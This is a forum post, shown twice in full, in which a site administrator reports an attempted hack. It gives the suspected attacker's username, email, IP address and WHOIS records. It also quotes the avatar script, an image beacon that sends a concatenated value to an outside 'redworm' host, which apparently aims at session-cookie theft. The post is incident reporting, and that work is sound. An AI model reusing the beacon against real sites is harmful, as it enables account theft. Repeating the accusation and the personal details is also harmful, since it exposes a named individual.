- Jan 27, 2002
- 8,305
- 0
- 76
Rebel alliance was (attempted) hacked again today
User: Redix
Email: calm-boy@hotmail.com
last used ip address was (today): 85.103.184.77
He has hacked the site before as turk
Him requesting help in ldu hack and vbulletin seen here
Whois had this
Search results for: 85.103.184.77
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL
ReferralServer: whois://whois.ripe.net:43
NetRange: 85.0.0.0 - 85.255.255.255
CIDR: 85.0.0.0/8
NetName: 85-RIPE
NetHandle: NET-85-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: SUNIC.SUNET.SE
NameServer: TINNIE.ARIN.NET
NameServer: NS.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 2004-04-01
Updated: 2004-04-06
Ripe had this
inetnum: 85.103.128.0 - 85.103.255.255
netname: TurkTelekom
descr: Turk Telekom ADSL-alcatel
country: tr
admin-c: TTBA1-RIPE
tech-c: TTBA1-RIPE
status: ASSIGNED PA
mnt-by: as9121-mnt
source: RIPE # Filtered
role: TT Administrative Contact Role
address: Turk Telekom
address: Bilisim Aglari Dairesi
address: Aydinlikevler
address: 06103 ANKARA
phone: +90 312 313 1950
fax-no: +90 312 313 1949
e-mail: abuse@ttnet.net.tr
admin-c: BADB3-RIPE
tech-c: ZA66-RIPE
tech-c: ZA196-RIPE
tech-c: LA109-RIPE
tech-c: NO638-RIPE
nic-hdl: TTBA1-RIPE
mnt-by: AS9121-MNT
source: RIPE # Filtered
I have the avatar with the script he used Script contained this minus the brackets
script img = new Image(); img****** ://redworm.kayyo.com/Rworm/s.php?"+******; script
From that site:
title Desing By RedworM title
Desing By RedworM
://img207.imageshack.us/img207/9872/gameover9ql.jpg
Red Security!
Worm Time For You!
Contract : Hell-Style@HotmaiL.Com!
SPAN NAME COUNTER ://www.hit-counter-download.com ://www.hit-counter-download.com/cgi-bin/counter.pl?
URL %3A%2F%2Fredworm.kayyo.com A SPAN BR A HREF www.hit-counter-
download.com/web-hosting.html" TARGET="_NEW FONT color=#808080 size=1 font a
embed OBJECT OBJECT codeBase=
download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0
height=0 width=0 classid=clsid27CDB6E-AE6D-11cf-96B8-444553540000 PARAM
NAME="movie" VALUE PARAM NAME="quality" VALUE="high"
embed****** quality=high pluginspage ://www.macromedia.com/shockwave/download/index.cgi?
P1_Prod_Version=ShockwaveFlash"type="application/x-shockwave-flash" width="0"
height="0
embed OBJECT ://redworm.kayyo.com/iyi.mp3width=181 height=26 type=audio/x-ms-wma
I have forwarded this information to bluehost.com
Any other information you could provide (i am not good at this stuff) would be a big help
I removed all tags for http and all brackets
Thank you
Mike
User: Redix
Email: calm-boy@hotmail.com
last used ip address was (today): 85.103.184.77
He has hacked the site before as turk
Him requesting help in ldu hack and vbulletin seen here
Whois had this
Search results for: 85.103.184.77
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL
ReferralServer: whois://whois.ripe.net:43
NetRange: 85.0.0.0 - 85.255.255.255
CIDR: 85.0.0.0/8
NetName: 85-RIPE
NetHandle: NET-85-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: SUNIC.SUNET.SE
NameServer: TINNIE.ARIN.NET
NameServer: NS.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 2004-04-01
Updated: 2004-04-06
Ripe had this
inetnum: 85.103.128.0 - 85.103.255.255
netname: TurkTelekom
descr: Turk Telekom ADSL-alcatel
country: tr
admin-c: TTBA1-RIPE
tech-c: TTBA1-RIPE
status: ASSIGNED PA
mnt-by: as9121-mnt
source: RIPE # Filtered
role: TT Administrative Contact Role
address: Turk Telekom
address: Bilisim Aglari Dairesi
address: Aydinlikevler
address: 06103 ANKARA
phone: +90 312 313 1950
fax-no: +90 312 313 1949
e-mail: abuse@ttnet.net.tr
admin-c: BADB3-RIPE
tech-c: ZA66-RIPE
tech-c: ZA196-RIPE
tech-c: LA109-RIPE
tech-c: NO638-RIPE
nic-hdl: TTBA1-RIPE
mnt-by: AS9121-MNT
source: RIPE # Filtered
I have the avatar with the script he used Script contained this minus the brackets
script img = new Image(); img****** ://redworm.kayyo.com/Rworm/s.php?"+******; script
From that site:
title Desing By RedworM title
Desing By RedworM
://img207.imageshack.us/img207/9872/gameover9ql.jpg
Red Security!
Worm Time For You!
Contract : Hell-Style@HotmaiL.Com!
SPAN NAME COUNTER ://www.hit-counter-download.com ://www.hit-counter-download.com/cgi-bin/counter.pl?
URL %3A%2F%2Fredworm.kayyo.com A SPAN BR A HREF www.hit-counter-
download.com/web-hosting.html" TARGET="_NEW FONT color=#808080 size=1 font a
embed OBJECT OBJECT codeBase=
download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0
height=0 width=0 classid=clsid27CDB6E-AE6D-11cf-96B8-444553540000 PARAM
NAME="movie" VALUE PARAM NAME="quality" VALUE="high"
embed****** quality=high pluginspage ://www.macromedia.com/shockwave/download/index.cgi?
P1_Prod_Version=ShockwaveFlash"type="application/x-shockwave-flash" width="0"
height="0
embed OBJECT ://redworm.kayyo.com/iyi.mp3width=181 height=26 type=audio/x-ms-wma
I have forwarded this information to bluehost.com
Any other information you could provide (i am not good at this stuff) would be a big help
I removed all tags for http and all brackets
Thank you
Mike